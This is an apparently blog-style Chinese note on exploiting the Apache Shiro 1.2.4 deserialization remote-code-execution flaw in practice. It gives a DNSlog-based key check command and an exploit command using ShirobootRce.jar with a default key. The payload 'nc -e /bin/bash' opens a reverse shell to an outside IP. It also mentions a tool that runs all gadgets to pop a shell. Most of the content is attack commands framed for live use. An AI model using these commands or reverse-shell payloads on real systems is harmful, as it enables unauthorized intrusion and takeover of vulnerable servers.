shiro RCE 攻击

这篇讲1.2.4的反序列化漏洞在实战中的记录

第一种比较稳妥的验证漏洞方式:

1 POC

python shiro_check_key.py https://xxx.xxx.xxx.xxx "my0njp.dnslog.cn"

shiro RCE (反序列化漏洞)

DNSlog收到请求(平台地址:http://www.dnslog.cn/

shiro RCE (反序列化漏洞)

2 EXP

这里的回显是基于spring框架的,其实可以直接用过监听JMPServer直接执行命令

java -jar ShirobootRce.jar https://xxx.xxx.xxx.xxx/login Z3VucwAAAAAAAAAAAAAAAA== c3 "nc -e /bin/bash xxx.xxx.xxx.xxx 8081"

shiro RCE (反序列化漏洞)

shiro RCE (反序列化漏洞)

第二种比较稳妥的验证漏洞的方式:

也需要结合第三方平台DNSlog

shiro RCE (反序列化漏洞)

默认会把所有的Gadget跑一遍,然后直接点执行就可以反弹shell

shiro RCE (反序列化漏洞)

相关文章: